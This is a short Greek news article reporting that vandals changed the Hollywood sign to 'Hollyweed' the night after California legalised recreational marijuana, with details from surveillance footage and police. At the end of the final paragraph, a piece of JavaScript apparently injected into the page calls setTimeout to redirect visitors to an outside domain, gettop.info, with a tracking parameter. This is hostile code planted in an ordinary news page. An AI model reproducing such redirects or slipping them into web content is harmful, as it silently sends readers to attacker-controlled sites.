Βανδάλισαν την πινακίδα του Hollywood

0
13

 

Άγνωστοι βανδάλισαν το βράδυ την εμβληματική πινακίδα Hollywood στη βουνοπλαγιά του Χόλιγουντ στη Νότια Καλιφόρνια που στήθηκε για πρώτη φορά το 1923 και πλέον από «ιερό ξύλο» αναγράφεται «ιερό χόρτο».

Οι δράστες άλλαξαν την πινακίδα προς τιμήν της μαριχουάνας σε «Hollyweed». Οι κάμερες παρακολούθησης της πόλης δείχνουν πλάνα από κάποιον άγνωστο ντυμένο στα μαύρα γύρω στις 3:00 π.μ. τοπικής ώρας (1:00 μ.μ. ώρα Ελλάδας), ο οποίος σύμφωνα με την αστυνομία είναι υπεύθυνος για την αλλαγή δύο γραμμάτων.

Ο άγνωστος τοποθέτησε ένα είδος μουσαμά πάνω από τα δύο «Ο» για να τα μετατρέψει σε «Ε», τον οποίο μουσαμά προσπαθούν να βρουν τρόπο να αφαιρέσουν οι αρχές της υπηρεσίας πάρκων. Η αστυνομία δεν έχει στον στόχο της κάποιον φερόμενο δράστη, ενώ αν συλληφθεί θα αντιμετωπίσει την κατηγορία καταπάτησης, η οποία αποτελεί πλημμέλημα.

Στις 8 Νοεμβρίου, η χρήση μαριχουάνας κρίθηκε νόμιμη από ενήλικες για λόγους αναψυχής, αν και η χρήση της παραμένει παράνομη σε ομοσπονδιακό επίπεδο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here